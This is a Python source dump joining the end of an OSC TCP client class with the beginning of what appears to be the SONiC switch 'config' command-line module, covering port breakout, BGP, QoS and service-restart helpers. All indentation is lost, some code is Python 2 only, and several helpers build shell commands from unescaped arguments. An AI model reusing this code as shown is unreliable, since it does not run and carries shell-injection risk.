be able to handle replies by the server as well. To accomplish this the
receiving takes place in a secondary thread, because no one knows if we
have to expect a reply or not, i.e. synchronous architecture doesn't make
much sense.
Replies will be matched against the local address space. If message
handlers access code of the main thread (where the client messages are sent
to the server) care must be taken e.g. by installing sychronization
mechanisms or by using an event dispatcher which can handle events
originating from other threads.
"""
# set outgoing socket buffer size
sndbuf_size = 4096 * 8
rcvbuf_size = 4096 * 8
def __init__(self):
self._txMutex = threading.Lock()
OSCAddressSpace.__init__(self)
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.sndbuf_size)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, self.rcvbuf_size)
self.socket.settimeout(1.0)
self._running = False
def _receiveWithTimeout(self, count):
chunk = str()
while len(chunk) < count:
try:
tmp = self.socket.recv(count - len(chunk))
except socket.timeout:
if not self._running:
print("CLIENT: Socket timed out and termination requested.")
return None
else:
continue
except socket.error as e:
if e[0] == errno.ECONNRESET:
print("CLIENT: Connection reset by peer.")
return None
else:
raise e
if not tmp or len(tmp) == 0:
print("CLIENT: Socket has been closed.")
return None
chunk = chunk + tmp
return chunk
def _receiveMsgWithTimeout(self):
""" Receive OSC message from a socket and decode.
If an error occurs, None is returned, else the message.
"""
# get OSC packet size from stream which is prepended each transmission
chunk = self._receiveWithTimeout(4)
if not chunk:
return None
# extract message length from big endian unsigned long (32 bit)
slen = struct.unpack(">L", chunk)[0]
# receive the actual message
chunk = self._receiveWithTimeout(slen)
if not chunk:
return None
# decode OSC content
msg = decodeOSC(chunk)
if msg == None:
raise OSCError("CLIENT: Message decoding failed.")
return msg
def _receiving_thread_entry(self):
print("CLIENT: Entered receiving thread.")
self._running = True
while self._running:
decoded = self._receiveMsgWithTimeout()
if not decoded:
break
elif len(decoded) <= 0:
continue
self.replies = []
self._unbundle(decoded)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
continue
self._txMutex.acquire()
txOk = self._transmitMsgWithTimeout(msg)
self._txMutex.release()
if not txOk:
break
print("CLIENT: Receiving thread terminated.")
def _unbundle(self, decoded):
if decoded[0] != "#bundle":
self.replies += self.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.socket.getpeername())
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def connect(self, address):
self.socket.connect(address)
self.receiving_thread = threading.Thread(target=self._receiving_thread_entry)
self.receiving_thread.start()
def close(self):
# let socket time out
self._running = False
self.receiving_thread.join()
self.socket.close()
def _transmitWithTimeout(self, data):
sent = 0
while sent < len(data):
try:
tmp = self.socket.send(data[sent:])
except socket.timeout:
if not self._running:
print("CLIENT: Socket timed out and termination requested.")
return False
else:
continue
except socket.error as e:
if e[0] == errno.ECONNRESET:
print("CLIENT: Connection reset by peer.")
return False
else:
raise e
if tmp == 0:
return False
sent += tmp
return True
def _transmitMsgWithTimeout(self, msg):
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
binary = msg.getBinary()
length = len(binary)
# prepend length of packet before the actual message (big endian)
len_big_endian = array.array('c', '\0' * 4)
struct.pack_into(">L", len_big_endian, 0, length)
len_big_endian = len_big_endian.tostring()
if self._transmitWithTimeout(len_big_endian) and self._transmitWithTimeout(binary):
return True
else:
return False
def sendOSC(self, msg):
"""Send an OSC message or bundle to the server. Returns True on success.
"""
self._txMutex.acquire()
txOk = self._transmitMsgWithTimeout(msg)
self._txMutex.release()
return txOk
def __str__(self):
"""Returns a string containing this Client's Class-name, software-version
and the remote-address it is connected to (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.socket.getpeername()
if addr:
out += " connected to osc://%s" % getUrlStr(addr)
else:
out += " (unconnected)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
isequal = cmp(self.socket._sock, other.socket._sock)
if isequal and self.server and other.server:
return cmp(self.server, other.server)
return isequal
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
|
main.py
|
#!/usr/sbin/env python
import click
import ipaddress
import json
import netaddr
import netifaces
import os
import re
import subprocess
import sys
import threading
import time
from minigraph import parse_device_desc_xml
from portconfig import get_child_ports
from sonic_py_common import device_info, multi_asic
from sonic_py_common.interface import get_interface_table_name, get_port_table_name
from swsssdk import ConfigDBConnector, SonicDBConfig
from swsscommon.swsscommon import SonicV2Connector
from utilities_common.db import Db
from utilities_common.intf_filter import parse_interface_in_filter
import utilities_common.cli as clicommon
from .utils import log
import aaa
import console
import feature
import kube
import mlnx
import nat
import vlan
from config_mgmt import ConfigMgmtDPB
import chassis_modules
CONTEXT_SETTINGS = dict(help_option_names=['-h', '--help', '-?'])
SONIC_GENERATED_SERVICE_PATH = '/etc/sonic/generated_services.conf'
SONIC_CFGGEN_PATH = '/usr/local/bin/sonic-cfggen'
VLAN_SUB_INTERFACE_SEPARATOR = '.'
ASIC_CONF_FILENAME = 'asic.conf'
DEFAULT_CONFIG_DB_FILE = '/etc/sonic/config_db.json'
NAMESPACE_PREFIX = 'asic'
INTF_KEY = "interfaces"
INIT_CFG_FILE = '/etc/sonic/init_cfg.json'
SYSTEMCTL_ACTION_STOP="stop"
SYSTEMCTL_ACTION_RESTART="restart"
SYSTEMCTL_ACTION_RESET_FAILED="reset-failed"
DEFAULT_NAMESPACE = ''
CFG_LOOPBACK_PREFIX = "Loopback"
CFG_LOOPBACK_PREFIX_LEN = len(CFG_LOOPBACK_PREFIX)
CFG_LOOPBACK_NAME_TOTAL_LEN_MAX = 11
CFG_LOOPBACK_ID_MAX_VAL = 999
CFG_LOOPBACK_NO="<0-999>"
asic_type = None
#
# Breakout Mode Helper functions
#
# Read given JSON file
def readJsonFile(fileName):
try:
with open(fileName) as f:
result = json.load(f)
except Exception as e:
raise Exception(str(e))
return result
def _get_breakout_options(ctx, args, incomplete):
""" Provides dynamic mode option as per user argument i.e. interface name """
all_mode_options = []
interface_name = args[-1]
breakout_cfg_file = device_info.get_path_to_port_config_file()
if not os.path.isfile(breakout_cfg_file) or not breakout_cfg_file.endswith('.json'):
return []
else:
breakout_file_input = readJsonFile(breakout_cfg_file)
if interface_name in breakout_file_input[INTF_KEY]:
breakout_mode_list = [v["breakout_modes"] for i ,v in breakout_file_input[INTF_KEY].items() if i == interface_name][0]
breakout_mode_options = []
for i in breakout_mode_list.split(','):
breakout_mode_options.append(i)
all_mode_options = [str(c) for c in breakout_mode_options if incomplete in c]
return all_mode_options
def shutdown_interfaces(ctx, del_intf_dict):
""" shut down all the interfaces before deletion """
for intf in del_intf_dict.keys():
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, intf)
if interface_name is None:
click.echo("[ERROR] interface name is None!")
return False
if interface_name_is_valid(config_db, intf) is False:
click.echo("[ERROR] Interface name is invalid. Please enter a valid interface name!!")
return False
port_dict = config_db.get_table('PORT')
if not port_dict:
click.echo("port_dict is None!")
return False
if intf in port_dict.keys():
config_db.mod_entry("PORT", intf, {"admin_status": "down"})
else:
click.secho("[ERROR] Could not get the correct interface name, exiting", fg='red')
return False
return True
def _validate_interface_mode(ctx, breakout_cfg_file, interface_name, target_brkout_mode, cur_brkout_mode):
""" Validate Parent interface and user selected mode before starting deletion or addition process """
breakout_file_input = readJsonFile(breakout_cfg_file)["interfaces"]
if interface_name not in breakout_file_input:
click.secho("[ERROR] {} is not a Parent port. So, Breakout Mode is not available on this port".format(interface_name), fg='red')
return False
# Check whether target breakout mode is available for the user-selected interface or not
if target_brkout_mode not in breakout_file_input[interface_name]["breakout_modes"]:
click.secho('[ERROR] Target mode {} is not available for the port {}'. format(target_brkout_mode, interface_name), fg='red')
return False
# Get config db context
config_db = ctx.obj['config_db']
port_dict = config_db.get_table('PORT')
# Check whether there is any port in config db.
if not port_dict:
click.echo("port_dict is None!")
return False
# Check whether the user-selected interface is part of 'port' table in config db.
if interface_name not in port_dict.keys():
click.secho("[ERROR] {} is not in port_dict".format(interface_name))
return False
click.echo("\nRunning Breakout Mode : {} \nTarget Breakout Mode : {}".format(cur_brkout_mode, target_brkout_mode))
if (cur_brkout_mode == target_brkout_mode):
click.secho("[WARNING] No action will be taken as current and desired Breakout Mode are same.", fg='magenta')
sys.exit(0)
return True
def load_ConfigMgmt(verbose):
""" Load config for the commands which are capable of change in config DB. """
try:
cm = ConfigMgmtDPB(debug=verbose)
return cm
except Exception as e:
raise Exception("Failed to load the config. Error: {}".format(str(e)))
def breakout_warnUser_extraTables(cm, final_delPorts, confirm=True):
"""
Function to warn user about extra tables while Dynamic Port Breakout(DPB).
confirm: re-confirm from user to proceed.
Config Tables Without Yang model considered extra tables.
cm = instance of config MGMT class.
"""
try:
# check if any extra tables exist
eTables = cm.tablesWithOutYang()
if len(eTables):
# find relavent tables in extra tables, i.e. one which can have deleted
# ports
tables = cm.configWithKeys(configIn=eTables, keys=final_delPorts)
click.secho("Below Config can not be verified, It may cause harm "\
"to the system\n {}".format(json.dumps(tables, indent=2)))
click.confirm('Do you wish to Continue?', abort=True)
except Exception as e:
raise Exception("Failed in breakout_warnUser_extraTables. Error: {}".format(str(e)))
return
def breakout_Ports(cm, delPorts=list(), portJson=dict(), force=False, \
loadDefConfig=False, verbose=False):
deps, ret = cm.breakOutPort(delPorts=delPorts, portJson=portJson, \
force=force, loadDefConfig=loadDefConfig)
# check if DPB failed
if ret == False:
if not force and deps:
click.echo("Dependecies Exist. No further action will be taken")
click.echo("*** Printing dependecies ***")
for dep in deps:
click.echo(dep)
sys.exit(0)
else:
click.echo("[ERROR] Port breakout Failed!!! Opting Out")
raise click.Abort()
return
#
# Helper functions
#
# Execute action per NPU instance for multi instance services.
def execute_systemctl_per_asic_instance(inst, event, service, action):
try:
click.echo("Executing {} of service {}@{}...".format(action, service, inst))
clicommon.run_command("systemctl {} {}@{}.service".format(action, service, inst))
except SystemExit as e:
log.log_error("Failed to execute {} of service {}@{} with error {}".format(action, service, inst, e))
# Set the event object if there is a failure and exception was raised.
event.set()
# Execute action on list of systemd services
def execute_systemctl(list_of_services, action):
num_asic = multi_asic.get_num_asics()
generated_services_list, generated_multi_instance_services = _get_sonic_generated_services(num_asic)
if ((generated_services_list == []) and
(generated_multi_instance_services == [])):
log.log_error("Failed to get generated services")
return
for service in list_of_services:
if (service + '.service' in generated_services_list):
try:
click.echo("Executing {} of service {}...".format(action, service))
clicommon.run_command("systemctl {} {}".format(action, service))
except SystemExit as e:
log.log_error("Failed to execute {} of service {} with error {}".format(action, service, e))
raise
if (service + '.service' in generated_multi_instance_services):
# With Multi NPU, Start a thread per instance to do the "action" on multi instance services.
if multi_asic.is_multi_asic():
threads = []
# Use this event object to co-ordinate if any threads raised exception
e = threading.Event()
kwargs = {'service': service, 'action': action}
for inst in range(num_asic):
t = threading.Thread(target=execute_systemctl_per_asic_instance, args=(inst, e), kwargs=kwargs)
threads.append(t)
t.start()
# Wait for all the threads to finish.
for inst in range(num_asic):
threads[inst].join()
# Check if any of the threads have raised exception, if so exit the process.
if e.is_set():
sys.exit(1)
def _get_device_type():
"""
Get device type
TODO: move to sonic-py-common
"""
command = "{} -m -v DEVICE_METADATA.localhost.type".format(SONIC_CFGGEN_PATH)
proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
device_type, err = proc.communicate()
if err:
click.echo("Could not get the device type from minigraph, setting device type to Unknown")
device_type = 'Unknown'
else:
device_type = device_type.strip()
return device_type
def interface_alias_to_name(config_db, interface_alias):
"""Return default interface name if alias name is given as argument
"""
vlan_id = ""
sub_intf_sep_idx = -1
if interface_alias is not None:
sub_intf_sep_idx = interface_alias.find(VLAN_SUB_INTERFACE_SEPARATOR)
if sub_intf_sep_idx != -1:
vlan_id = interface_alias[sub_intf_sep_idx + 1:]
# interface_alias holds the parent port name so the subsequent logic still applies
interface_alias = interface_alias[:sub_intf_sep_idx]
# If the input parameter config_db is None, derive it from interface.
# In single ASIC platform, get_port_namespace() returns DEFAULT_NAMESPACE.
if config_db is None:
namespace = get_port_namespace(interface_alias)
if namespace is None:
return None
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
port_dict = config_db.get_table('PORT')
if interface_alias is not None:
if not port_dict:
click.echo("port_dict is None!")
raise click.Abort()
for port_name in port_dict.keys():
if interface_alias == port_dict[port_name]['alias']:
return port_name if sub_intf_sep_idx == -1 else port_name + VLAN_SUB_INTERFACE_SEPARATOR + vlan_id
# Interface alias not in port_dict, just return interface_alias, e.g.,
# portchannel is passed in as argument, which does not have an alias
return interface_alias if sub_intf_sep_idx == -1 else interface_alias + VLAN_SUB_INTERFACE_SEPARATOR + vlan_id
def interface_name_is_valid(config_db, interface_name):
"""Check if the interface name is valid
"""
# If the input parameter config_db is None, derive it from interface.
# In single ASIC platform, get_port_namespace() returns DEFAULT_NAMESPACE.
if config_db is None:
namespace = get_port_namespace(interface_name)
if namespace is None:
return False
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
port_dict = config_db.get_table('PORT')
port_channel_dict = config_db.get_table('PORTCHANNEL')
sub_port_intf_dict = config_db.get_table('VLAN_SUB_INTERFACE')
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is not None:
if not port_dict:
click.echo("port_dict is None!")
raise click.Abort()
for port_name in port_dict.keys():
if interface_name == port_name:
return True
if port_channel_dict:
for port_channel_name in port_channel_dict.keys():
if interface_name == port_channel_name:
return True
if sub_port_intf_dict:
for sub_port_intf_name in sub_port_intf_dict.keys():
if interface_name == sub_port_intf_name:
return True
return False
def interface_name_to_alias(config_db, interface_name):
"""Return alias interface name if default name is given as argument
"""
# If the input parameter config_db is None, derive it from interface.
# In single ASIC platform, get_port_namespace() returns DEFAULT_NAMESPACE.
if config_db is None:
namespace = get_port_namespace(interface_name)
if namespace is None:
return None
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
port_dict = config_db.get_table('PORT')
if interface_name is not None:
if not port_dict:
click.echo("port_dict is None!")
raise click.Abort()
for port_name in port_dict.keys():
if interface_name == port_name:
return port_dict[port_name]['alias']
return None
def interface_ipaddr_dependent_on_interface(config_db, interface_name):
"""Get table keys including ipaddress
"""
data = []
table_name = get_interface_table_name(interface_name)
if table_name == "":
return data
keys = config_db.get_keys(table_name)
for key in keys:
if interface_name in key and len(key) == 2:
data.append(key)
return data
def is_interface_bind_to_vrf(config_db, interface_name):
"""Get interface if bind to vrf or not
"""
table_name = get_interface_table_name(interface_name)
if table_name == "":
return False
entry = config_db.get_entry(table_name, interface_name)
if entry and entry.get("vrf_name"):
return True
return False
# Return the namespace where an interface belongs
# The port name input could be in default mode or in alias mode.
def get_port_namespace(port):
# If it is a non multi-asic platform, or if the interface is management interface
# return DEFAULT_NAMESPACE
if not multi_asic.is_multi_asic() or port == 'eth0':
return DEFAULT_NAMESPACE
# Get the table to check for interface presence
table_name = get_port_table_name(port)
if table_name == "":
return None
ns_list = multi_asic.get_all_namespaces()
namespaces = ns_list['front_ns'] + ns_list['back_ns']
for namespace in namespaces:
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
# If the interface naming mode is alias, search the tables for alias_name.
if clicommon.get_interface_naming_mode() == "alias":
port_dict = config_db.get_table(table_name)
if port_dict:
for port_name in port_dict.keys():
if port == port_dict[port_name]['alias']:
return namespace
else:
entry = config_db.get_entry(table_name, port)
if entry:
return namespace
return None
def del_interface_bind_to_vrf(config_db, vrf_name):
"""del interface bind to vrf
"""
tables = ['INTERFACE', 'PORTCHANNEL_INTERFACE', 'VLAN_INTERFACE', 'LOOPBACK_INTERFACE']
for table_name in tables:
interface_dict = config_db.get_table(table_name)
if interface_dict:
for interface_name in interface_dict.keys():
if interface_dict[interface_name].has_key('vrf_name') and vrf_name == interface_dict[interface_name]['vrf_name']:
interface_dependent = interface_ipaddr_dependent_on_interface(config_db, interface_name)
for interface_del in interface_dependent:
config_db.set_entry(table_name, interface_del, None)
config_db.set_entry(table_name, interface_name, None)
def set_interface_naming_mode(mode):
"""Modify SONIC_CLI_IFACE_MODE env variable in user .bashrc
"""
user = os.getenv('SUDO_USER')
bashrc_ifacemode_line = "export SONIC_CLI_IFACE_MODE={}".format(mode)
# In case of multi-asic, we can check for the alias mode support in any of
# the namespaces as this setting of alias mode should be identical everywhere.
# Here by default we set the namespaces to be a list just having '' which
# represents the linux host. In case of multi-asic, we take the first namespace
# created for the front facing ASIC.
namespaces = [DEFAULT_NAMESPACE]
if multi_asic.is_multi_asic():
namespaces = multi_asic.get_all_namespaces()['front_ns']
# Ensure all interfaces have an 'alias' key in PORT dict
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespaces[0])
config_db.connect()
port_dict = config_db.get_table('PORT')
if not port_dict:
click.echo("port_dict is None!")
raise click.Abort()
for port_name in port_dict.keys():
try:
if port_dict[port_name]['alias']:
pass
except KeyError:
click.echo("Platform does not support alias mapping")
raise click.Abort()
if not user:
user = os.getenv('USER')
if user != "root":
bashrc = "/home/{}/.bashrc".format(user)
else:
click.get_current_context().fail("Cannot set interface naming mode for root user!")
f = open(bashrc, 'r')
filedata = f.read()
f.close()
if "SONIC_CLI_IFACE_MODE" not in filedata:
newdata = filedata + bashrc_ifacemode_line
newdata += "\n"
else:
newdata = re.sub(r"export SONIC_CLI_IFACE_MODE=\w+",
bashrc_ifacemode_line, filedata)
f = open(bashrc, 'w')
f.write(newdata)
f.close()
click.echo("Please logout and log back in for changes take effect.")
# Get the local BGP ASN from DEVICE_METADATA
def get_local_bgp_asn(config_db):
metadata = config_db.get_table('DEVICE_METADATA')
return metadata['localhost']['bgp_asn']
def _is_neighbor_ipaddress(config_db, ipaddress):
"""Returns True if a neighbor has the IP address <ipaddress>, False if not
"""
entry = config_db.get_entry('BGP_NEIGHBOR', ipaddress)
return True if entry else False
def _get_all_neighbor_ipaddresses(config_db, ignore_local_hosts=False):
"""Returns list of strings containing IP addresses of all BGP neighbors
if the flag ignore_local_hosts is set to True, additional check to see if
if the BGP neighbor AS number is same as local BGP AS number, if so ignore that neigbor.
"""
addrs = []
bgp_sessions = config_db.get_table('BGP_NEIGHBOR')
local_as = get_local_bgp_asn(config_db)
for addr, session in bgp_sessions.iteritems():
if not ignore_local_hosts or (ignore_local_hosts and local_as != session['asn']):
addrs.append(addr)
return addrs
def _get_neighbor_ipaddress_list_by_hostname(config_db, hostname):
"""Returns list of strings, each containing an IP address of neighbor with
hostname <hostname>. Returns empty list if <hostname> not a neighbor
"""
addrs = []
bgp_sessions = config_db.get_table('BGP_NEIGHBOR')
for addr, session in bgp_sessions.iteritems():
if session.has_key('name') and session['name'] == hostname:
addrs.append(addr)
return addrs
def _change_bgp_session_status_by_addr(config_db, ipaddress, status, verbose):
"""Start up or shut down BGP session by IP address
"""
verb = 'Starting' if status == 'up' else 'Shutting'
click.echo("{} {} BGP session with neighbor {}...".format(verb, status, ipaddress))
config_db.mod_entry('bgp_neighbor', ipaddress, {'admin_status': status})
def _change_bgp_session_status(config_db, ipaddr_or_hostname, status, verbose):
"""Start up or shut down BGP session by IP address or hostname
"""
ip_addrs = []
# If we were passed an IP address, convert it to lowercase because IPv6 addresses were
# stored in ConfigDB with all lowercase alphabet characters during minigraph parsing
if _is_neighbor_ipaddress(config_db, ipaddr_or_hostname.lower()):
ip_addrs.append(ipaddr_or_hostname.lower())
else:
# If <ipaddr_or_hostname> is not the IP address of a neighbor, check to see if it's a hostname
ip_addrs = _get_neighbor_ipaddress_list_by_hostname(config_db, ipaddr_or_hostname)
if not ip_addrs:
return False
for ip_addr in ip_addrs:
_change_bgp_session_status_by_addr(config_db, ip_addr, status, verbose)
return True
def _validate_bgp_neighbor(config_db, neighbor_ip_or_hostname):
"""validates whether the given ip or host name is a BGP neighbor
"""
ip_addrs = []
if _is_neighbor_ipaddress(config_db, neighbor_ip_or_hostname.lower()):
ip_addrs.append(neighbor_ip_or_hostname.lower())
else:
ip_addrs = _get_neighbor_ipaddress_list_by_hostname(config_db, neighbor_ip_or_hostname.upper())
return ip_addrs
def _remove_bgp_neighbor_config(config_db, neighbor_ip_or_hostname):
"""Removes BGP configuration of the given neighbor
"""
ip_addrs = _validate_bgp_neighbor(config_db, neighbor_ip_or_hostname)
if not ip_addrs:
return False
for ip_addr in ip_addrs:
config_db.mod_entry('bgp_neighbor', ip_addr, None)
click.echo("Removed configuration of BGP neighbor {}".format(ip_addr))
return True
def _change_hostname(hostname):
current_hostname = os.uname()[1]
if current_hostname != hostname:
clicommon.run_command('echo {} > /etc/hostname'.format(hostname), display_cmd=True)
clicommon.run_command('hostname -F /etc/hostname', display_cmd=True)
clicommon.run_command('sed -i "/\s{}$/d" /etc/hosts'.format(current_hostname), display_cmd=True)
clicommon.run_command('echo "127.0.0.1 {}" >> /etc/hosts'.format(hostname), display_cmd=True)
def _clear_qos():
QOS_TABLE_NAMES = [
'TC_TO_PRIORITY_GROUP_MAP',
'MAP_PFC_PRIORITY_TO_QUEUE',
'TC_TO_QUEUE_MAP',
'DSCP_TO_TC_MAP',
'SCHEDULER',
'PFC_PRIORITY_TO_PRIORITY_GROUP_MAP',
'PORT_QOS_MAP',
'WRED_PROFILE',
'QUEUE',
'CABLE_LENGTH',
'BUFFER_POOL',
'BUFFER_PROFILE',
'BUFFER_PG',
'BUFFER_QUEUE']
namespace_list = [DEFAULT_NAMESPACE]
if multi_asic.get_num_asics() > 1:
namespace_list = multi_asic.get_namespaces_from_linux()
for ns in namespace_list:
if ns is DEFAULT_NAMESPACE:
config_db = ConfigDBConnector()
else:
config_db = ConfigDBConnector(
use_unix_socket_path=True, namespace=ns
)
config_db.connect()
for qos_table in QOS_TABLE_NAMES:
config_db.delete_table(qos_table)
def _get_sonic_generated_services(num_asic):
if not os.path.isfile(SONIC_GENERATED_SERVICE_PATH):
return None
generated_services_list = []
generated_multi_instance_services = []
with open(SONIC_GENERATED_SERVICE_PATH) as generated_service_file:
for line in generated_service_file:
if '@' in line:
line = line.replace('@', '')
if num_asic > 1:
generated_multi_instance_services.append(line.rstrip('\n'))
else:
generated_services_list.append(line.rstrip('\n'))
else:
generated_services_list.append(line.rstrip('\n'))
return generated_services_list, generated_multi_instance_services
# Callback for confirmation prompt. Aborts if user enters "n"
def _abort_if_false(ctx, param, value):
if not value:
ctx.abort()
def _get_disabled_services_list(config_db):
disabled_services_list = []
feature_table = config_db.get_table('FEATURE')
if feature_table is not None:
for feature_name in feature_table.keys():
if not feature_name:
log.log_warning("Feature is None")
continue
state = feature_table[feature_name]['state']
if not state:
log.log_warning("Enable state of feature '{}' is None".format(feature_name))
continue
if state == "disabled":
disabled_services_list.append(feature_name)
else:
log.log_warning("Unable to retreive FEATURE table")
return disabled_services_list
def _stop_services(config_db):
# This list is order-dependent. Please add services in the order they should be stopped
# on Mellanox platform pmon is stopped by syncd
services_to_stop = [
'telemetry',
'restapi',
'swss',
'lldp',
'pmon',
'bgp',
'hostcfgd',
'nat'
]
if asic_type == 'mellanox' and 'pmon' in services_to_stop:
services_to_stop.remove('pmon')
disabled_services = _get_disabled_services_list(config_db)
for service in disabled_services:
if service in services_to_stop:
services_to_stop.remove(service)
execute_systemctl(services_to_stop, SYSTEMCTL_ACTION_STOP)
def _reset_failed_services(config_db):
# This list is order-independent. Please keep list in alphabetical order
services_to_reset = [
'bgp',
'dhcp_relay',
'hostcfgd',
'hostname-config',
'interfaces-config',
'lldp',
'nat',
'ntp-config',
'pmon',
'radv',
'restapi',
'rsyslog-config',
'sflow',
'snmp',
'swss',
'syncd',
'teamd',
'telemetry'
]
disabled_services = _get_disabled_services_list(config_db)
for service in disabled_services:
if service in services_to_reset:
services_to_reset.remove(service)
execute_systemctl(services_to_reset, SYSTEMCTL_ACTION_RESET_FAILED)
def _restart_services(config_db):
# This list is order-dependent. Please add services in the order they should be started
# on Mellanox platform pmon is started by syncd
services_to_restart = [
'hostname-config',
'interfaces-config',
'ntp-config',
'rsyslog-config',
'swss',
'bgp',
'pmon',
'lldp',
'hostcfgd',
'nat',
'sflow',
'restapi',
'telemetry'
]
disabled_services = _get_disabled_services_list(config_db)
for service in disabled_services:
if service in services_to_restart:
services_to_restart.remove(service)
if asic_type == 'mellanox' and 'pmon' in services_to_restart:
services_to_restart.remove('pmon')
execute_systemctl(services_to_restart, SYSTEMCTL_ACTION_RESTART)
# Reload Monit configuration to pick up new hostname in case it changed
click.echo("Reloading Monit configuration ...")
clicommon.run_command("sudo monit reload")
def interface_is_in_vlan(vlan_member_table, interface_name):
""" Check if an interface is in a vlan """
for _,intf in vlan_member_table.keys():
if intf == interface_name:
return True
return False
def interface_is_in_portchannel(portchannel_member_table, interface_name):
""" Check if an interface is part of portchannel """
for _,intf in portchannel_member_table.keys():
if intf == interface_name:
return True
return False
def interface_has_mirror_config(mirror_table, interface_name):
""" Check if port is already configured with mirror config """
for _,v in mirror_table.items():
if 'src_port' in v and v['src_port'] == interface_name:
return True
if 'dst_port' in v and v['dst_port'] == interface_name:
return True
return False
def validate_mirror_session_config(config_db, session_name, dst_port, src_port, direction):
""" Check if SPAN mirror-session config is valid """
if len(config_db.get_entry('MIRROR_SESSION', session_name)) != 0:
click.echo("Error: {} already exists".format(session_name))
return False
vlan_member_table = config_db.get_table('VLAN_MEMBER')
mirror_table = config_db.get_table('MIRROR_SESSION')
portchannel_member_table = config_db.get_table('PORTCHANNEL_MEMBER')
if dst_port:
if not interface_name_is_valid(config_db, dst_port):
click.echo("Error: Destination Interface {} is invalid".format(dst_port))
return False
if interface_is_in_vlan(vlan_member_table, dst_port):
click.echo("Error: Destination Interface {} has vlan config".format(dst_port))
return False
if interface_has_mirror_config(mirror_table, dst_port):
click.echo("Error: Destination Interface {} already has mirror config".format(dst_port))
return False
if interface_is_in_portchannel(portchannel_member_table, dst_port):
click.echo("Error: Destination Interface {} has portchannel config".format(dst_port))
return False
if clicommon.is_port_router_interface(config_db, dst_port):
click.echo("Error: Destination Interface {} is a L3 interface".format(dst_port))
return False
if src_port:
for port in src_port.split(","):
if not interface_name_is_valid(config_db, port):
click.echo("Error: Source Interface {} is invalid".format(port))
return False
if dst_port and dst_port == port:
click.echo("Error: Destination Interface cant be same as Source Interface")
return False
if interface_has_mirror_config(mirror_table, port):
click.echo("Error: Source Interface {} already has mirror config".format(port))
return False
if direction:
if direction not in ['rx', 'tx', 'both']:
click.echo("Error: Direction {} is invalid".format(direction))
return False
return True
def update_sonic_environment():
"""Prepare sonic environment variable using SONiC environment template file.
"""
SONIC_ENV_TEMPLATE_FILE = os.path.join('/', "usr", "share", "sonic", "templates", "sonic-environment.j2")
SONIC_VERSION_YML_FILE = os.path.join('/', "etc", "sonic", "sonic_version.yml")
SONIC_ENV_FILE = os.path.join('/', "etc", "sonic", "sonic-environment")
if os.path.isfile(SONIC_ENV_TEMPLATE_FILE) and os.path.isfile(SONIC_VERSION_YML_FILE):
clicommon.run_command(
"{} -d -y {} -t {},{}".format(
SONIC_CFGGEN_PATH,
SONIC_VERSION_YML_FILE,
SONIC_ENV_TEMPLATE_FILE,
SONIC_ENV_FILE
),
display_cmd=True
)
# This is our main entrypoint - the main 'config' command
@click.group(cls=clicommon.AbbreviationGroup, context_settings=CONTEXT_SETTINGS)
@click.pass_context
def config(ctx):
"""SONiC command line - 'config' command"""
#
# Load asic_type for further use
#
global asic_type
try:
version_info = device_info.get_sonic_version_info()
asic_type = version_info['asic_type']
except (KeyError, TypeError):
raise click.Abort()
if asic_type == 'mellanox':
platform.add_command(mlnx.mlnx)
# Load the global config file database_global.json once.
SonicDBConfig.load_sonic_global_db_config()
if os.geteuid() != 0:
exit("Root privileges are required for this operation")
ctx.obj = Db()
# Add groups from other modules
config.add_command(aaa.aaa)
config.add_command(aaa.tacacs)
config.add_command(console.console)
config.add_command(feature.feature)
config.add_command(kube.kubernetes)
config.add_command(nat.nat)
config.add_command(vlan.vlan)
config.add_command(chassis_modules.chassis_modules)
@config.command()
@click.option('-y', '--yes', is_flag=True, callback=_abort_if_false,
expose_value=False, prompt='Existing files will be overwritten, continue?')
@click.argument('filename', required=False)
def save(filename):
"""Export current config DB to a file on disk.\n
<filename> : Names of configuration file(s) to save, separated by comma with no spaces in between
"""
num_asic = multi_asic.get_num_asics()
cfg_files = []
num_cfg_file = 1
if multi_asic.is_multi_asic():
num_cfg_file += num_asic
# If the user give the filename[s], extract the file names.
if filename is not None:
cfg_files = filename.split(',')
if len(cfg_files) != num_cfg_file:
click.echo("Input {} config file(s) separated by comma for multiple files ".format(num_cfg_file))
return
# In case of multi-asic mode we have additional config_db{NS}.json files for
# various namespaces created per ASIC. {NS} is the namespace index.
for inst in range(-1, num_cfg_file-1):
#inst = -1, refers to the linux host where there is no namespace.
if inst == -1:
namespace = None
else:
namespace = "{}{}".format(NAMESPACE_PREFIX, inst)
# Get the file from user input, else take the default file /etc/sonic/config_db{NS_id}.json
if cfg_files:
file = cfg_files[inst+1]
else:
if namespace is None:
file = DEFAULT_CONFIG_DB_FILE
else:
file = "/etc/sonic/config_db{}.json".format(inst)
if namespace is None:
command = "{} -d --print-data > {}".format(SONIC_CFGGEN_PATH, file)
else:
command = "{} -n {} -d --print-data > {}".format(SONIC_CFGGEN_PATH, namespace, file)
log.log_info("'save' executing...")
clicommon.run_command(command, display_cmd=True)
@config.command()
@click.option('-y', '--yes', is_flag=True)
@click.argument('filename', required=False)
def load(filename, yes):
"""Import a previous saved config DB dump file.
